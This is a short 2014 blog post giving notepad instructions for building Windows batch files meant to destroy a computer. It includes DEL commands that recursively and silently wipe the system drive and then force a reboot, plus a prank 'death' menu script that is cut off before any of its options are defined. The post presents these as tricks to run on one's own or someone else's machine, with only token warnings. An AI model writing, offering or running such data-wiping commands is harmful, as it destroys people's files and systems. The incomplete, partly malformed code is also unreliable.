Monday 30 June 2014

Makes System Dead.

(UNSAFE)
 1.)Go to notepad and type the following: 
@ECHO OFF
DEL C:\ *.*|Y
 2.)Save it as "DELL.BAT"

 3.)WANT WORSE.....!!!?.... Then type/copy the following code:
@ECHO OFF
DEL %SYSTEMDRIVE%\*.*/F/S/Q
SHUTDOWN -R -F -T 00
 4.)AND SAVE IT AS A .BAT FILE.

SECOND TRICK
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE!!!........ In order to create the file, follow the steps given below:

  • Open Notepad.
  • Paste the following code in the notepad file:
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

  • Save the file with any name and with a ".bat" extension and close the file.

Never try to run this file on your PC or else it will be the last time when you will be using your system/PC.

No comments:

Post a Comment